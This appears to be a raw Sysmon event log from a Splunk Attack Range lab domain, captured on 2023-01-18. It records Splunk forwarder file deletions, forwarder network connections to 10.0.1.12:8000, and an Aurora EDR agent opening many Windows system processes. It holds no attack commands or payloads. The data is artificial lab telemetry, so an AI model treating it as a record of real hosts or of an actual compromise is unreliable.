Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9153CB0CA5464C30D30EAFA8C00E559F,SHA256=26A73714DED31EB28A67F972C3E2066DE665D72E0ADFEC2B09F17ED41CB9C2A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:44.446{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD40AB8B8AD8D143D6E91D540C7B5170,SHA256=6E790BED84106E8D2802B82FC5F157335E9D119B71DCE2BFE8BC278F02C2949D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017823Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:45.917{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367F644FBAE6C7247535BBCB430DDD22,SHA256=48BA805393F8D11601C19CE95F39FF5037205AED877500EC55936486BEEDA5AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:42.618{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56422-false10.0.1.12-8000- 23542300x800000000000000045395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:45.543{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F3DAA5C245BBBBBDDF0DA8422390FA4,SHA256=A87811311933B5B2067D096B1CB2DE9ABD55F538D31B0B31B9444FCD3312D0ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:46.627{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D687507A80FF3F78919A257D5CAEC9BF,SHA256=565038994201485E58D5E044D00B04A56E03D0529F5B9EC88556043B8DFD97D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017824Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:44.130{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50151-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:47.725{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D88B7CA6C606DE243A9D04E4C320C6,SHA256=4CEBA6CC8E974B41BEACC523A795169FDD8FEB39D5E6EDE690AF1F23BDF194A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017825Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:47.009{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51599A4F144F1A3F01C2BEFA6F82B02C,SHA256=D165F75BD7B02733663CC7DA0DC66398EDB72D6EF881F57AB6B6C92EF7E64EF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:48.746{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE53F349DECFFD3CF9E1A5C7F796167,SHA256=F109B284E462B52A36ADC50148ADBAD889B2861DE49AD0F9055D6346BE954C79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017826Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:48.115{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A30C0A8E137A33072A4659F6C7F98E5,SHA256=5A5A5681D4181B3EEDFC669FBAB0EC4E32FA729F4C4A8082D98FA6431A770EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:49.866{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E616E4FE2F31175153E34BB3E73FAE88,SHA256=C6FC0A2A8DA1D0513B424A7382D757FAB315B38A808AF3D8BB45B2473DD57CCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017827Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:49.190{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716327330DD06100B2FDC06F411CBEAE,SHA256=AF4671172FD1C309DC9DC8FA487B5CC32BABD05E8F066D0B573E1D971BC9483A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:50.954{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF8D57FF8C2ED358C646A6F3E3920871,SHA256=4B4F2B20FA763838CB4FB33173BC4B14D0C1A16B92525852EFA6C0E15857E1DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017828Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:50.286{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DBBE86130B5D9509F31B699F17D7939,SHA256=DE4612B6B25847EF2AB44AA5B8BB38A29C0197550F2FD47E3BD3A4A29C80B8E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:48.627{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56423-false10.0.1.12-8000- 23542300x800000000000000017829Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:51.370{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04116EA7E11C6566DE783A2C4C80D8C3,SHA256=AC3BE860655D86907AEBDCF9CF031032585866CF8686CEA0356C842AC56C3B3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.917{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.911{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.910{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:51.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 